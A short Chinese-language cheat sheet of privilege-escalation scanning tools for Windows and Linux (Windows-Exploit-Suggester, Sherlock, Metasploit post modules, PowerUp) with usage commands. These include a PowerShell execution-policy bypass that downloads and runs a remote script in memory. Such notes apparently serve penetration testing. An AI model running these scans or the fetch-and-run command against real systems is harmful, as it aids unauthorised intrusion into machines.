提权扫描工具

1，Windows-Exploit-Suggester
使用Windows-Exploit-Suggester解析systeminfo
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
由于最新版的xlrd对xls的处理方式不同了，导致这个脚本有使用会报错，所以我们使用老版本的xlrd，记得是如下命令
pip2.7 install xlrd==1.2.0

python2 windows-exploit-suggester.py --update

python2 windows-exploit-suggester.py --database 2022-06-07-mssb.xls --systeminfo 1.txt

2，使用Linux-Exploit-Suggester.sh寻找linux提权问题
下载地址：https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

3，使用Sherlock工具
下载地址：https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1
Find-AllVulns

4，使用MSF查询补丁和可利用提权漏洞
他妈的发现多次的把目标机进程扫死

meterpreter> run post/windows/gather/enum_patches 

meterpreter> run post/multi/recon/local_exploit_suggester 

5，使用powerup检查提权漏洞

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

6，在线网页查询
查询地址：

http://bugs.hacking8.com/tiquan/
http://blog.neargle.com/win-powerup-exp-index/